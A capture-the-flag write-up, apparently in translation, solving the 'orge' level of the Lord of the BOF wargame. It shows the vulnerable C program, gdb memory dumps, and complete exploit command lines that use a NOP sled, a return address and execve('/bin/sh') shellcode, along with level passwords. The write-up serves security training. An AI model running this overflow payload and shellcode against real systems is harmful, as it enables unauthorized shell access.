login : darkelf
password : kernel crashed
/*
The Lord of the BOF : The Fellowship of the BOF
- orge
- check argv[0]
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strlen, strcpy, memset */
extern char **environ;
int main(int argc, char *argv[])
{
    char buffer[40];
    int i;
    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }
    // here is changed!  (new in this level: the program name must be exactly 77 bytes)
    if(strlen(argv[0]) != 77){
        printf("argv[0] error\n");
        exit(0);
    }
    // egghunter: wipe every environment string so nothing can be staged there
    for(i=0; environ[i]; i++)
        memset(environ[i], 0, strlen(environ[i]));
    if(argv[1][47] != '\xbf')
    {
        printf("stack is still your friend.\n");
        exit(0);
    }
    // check the length of argument
    if(strlen(argv[1]) > 48){
        printf("argument is too long!\n");
        exit(0);
    }
    strcpy(buffer, argv[1]);   /* up to 48 bytes into a 40-byte buffer: the intended overflow */
    printf("%s\n", buffer);
    // buffer hunter: clear the buffer before returning
    memset(buffer, 0, 40);
    return 0;
}
A block marked "here is changed!" has been added.
The length of argv[0] must be 77.
Since argv[0] is "orge", you have to use a symbolic link to make it 77 characters long.
aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa is something I made while fumbling around; I'll solve it with AAAAAAAAAAAAA instead...
I wasted a whole hour messing around before solving it....
Because of the file permissions, I'll copy orge and solve it that way.
cp orge `python -c 'print "B"*75'`
`python -c 'print "./"+"B"*75'` `python -c 'print "\x90"*44+"\xbf\xbf\xbf\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
A core file was generated, so let's analyze it with gdb.
0xbffffaa0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffab0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffac0: 0x00000000 0x00000000 0x00000000 0x36383669
0xbffffad0: 0x422f2e00 0x42424242 0x42424242 0x42424242
0xbffffae0: 0x42424242 0x42424242 0x42424242 0x42424242
---Type <return> to continue, or q <return> to quit---
0xbffffaf0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb00: 0x42424242 0x42424242 0x42424242 0x42424242
(gdb) x/100x 0xbffffb00
0xbffffb00: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb10: 0x42424242 0x42424242 0x42424242 0x90004242
0xbffffb20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb40: 0x90909090 0x90909090 0xbf909090 0x00bfbfbf
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb60: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb70: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb80: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb90: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffba0: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb0: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
Seeing 0x42424242 at 0xbffffad0, that is where argv[0] (BBBBBB...) lands,
from 0xbffffb20 on it is argv[1] (0x90 0x90 0x90...),
and from the 0xbffffb50 row on you can see the value of argv[2] going in.
I set the return address to 0xbffffbb0 and put it in.
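To reproduce this reading of the dump mechanically rather than by eye, here is an added Python example (not part of the original write-up) that parses gdb `x/Nx` output into a byte map and locates the runs of 'B', 0x90 and 0xbf bytes; the sample dump is rows copied from the core dump above, with the rows between 0xbffffb50 and 0xbffffbb0 omitted.

```python
import re
# Constructed sample: rows copied from the `x/100x` core dump above; the rows
# between 0xbffffb50 and 0xbffffbb0 are left out to keep the sample short.
GDB_DUMP = """\
0xbffffad0: 0x422f2e00 0x42424242 0x42424242 0x42424242
0xbffffae0: 0x42424242 0x42424242 0x42424242 0x42424242
---Type <return> to continue, or q <return> to quit---
0xbffffaf0: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb00: 0x42424242 0x42424242 0x42424242 0x42424242
0xbffffb10: 0x42424242 0x42424242 0x42424242 0x90004242
0xbffffb20: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb30: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffb40: 0x90909090 0x90909090 0xbf909090 0x00bfbfbf
0xbffffb50: 0x90909090 0x90909090 0x90909090 0x90909090
0xbffffbb0: 0x90909090 0x6850c031 0x68732f2f 0x69622f68
"""
LINE_RE = re.compile(r"^(0x[0-9a-f]+):((?:\s+0x[0-9a-f]{8})+)$")

def parse_gdb_words(dump):
    """Map byte address -> value. gdb prints each 32-bit word little-endian,
    so the lowest address holds the low byte of the printed word."""
    mem = {}
    for line in dump.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:  # pager prompts and other non-dump lines
            continue
        base = int(m.group(1), 16)
        for k, word in enumerate(m.group(2).split()):
            value = int(word, 16)
            for b in range(4):
                mem[base + 4 * k + b] = (value >> (8 * b)) & 0xFF
    return mem

def find_runs(mem, byte, min_len):
    """(start, length) of every contiguous run of `byte` at least min_len long."""
    runs, start, prev = [], None, None
    for a in sorted(mem) + [None]:  # trailing None flushes the last run
        inside = a is not None and mem[a] == byte
        if inside and start is not None and a == prev + 1:
            prev = a
            continue
        if start is not None and prev - start + 1 >= min_len:
            runs.append((start, prev - start + 1))
        start = prev = a if inside else None
    return runs

def find_bytes(mem, pattern):
    """Lowest address where `pattern` appears contiguously, or -1 if absent."""
    hits = (a for a in sorted(mem) if all(mem.get(a + k) == v for k, v in enumerate(pattern)))
    return next(hits, -1)
```

On this sample the 75 'B's of argv[0] start at 0xbffffad3 (right after "./"), the 44 NOPs of argv[1] at 0xbffffb1f, the four 0xbf bytes at 0xbffffb4b, and the first shellcode bytes at 0xbffffbb4, which shows why 0xbffffbb0 sits inside argv[2]'s NOP run.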
`python -c 'print "./"+"A"*75'` `python -c 'print "\x90"*44+"\xb0\xfb\xff\xbf"'` `python -c 'print "\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80"'`
timewalker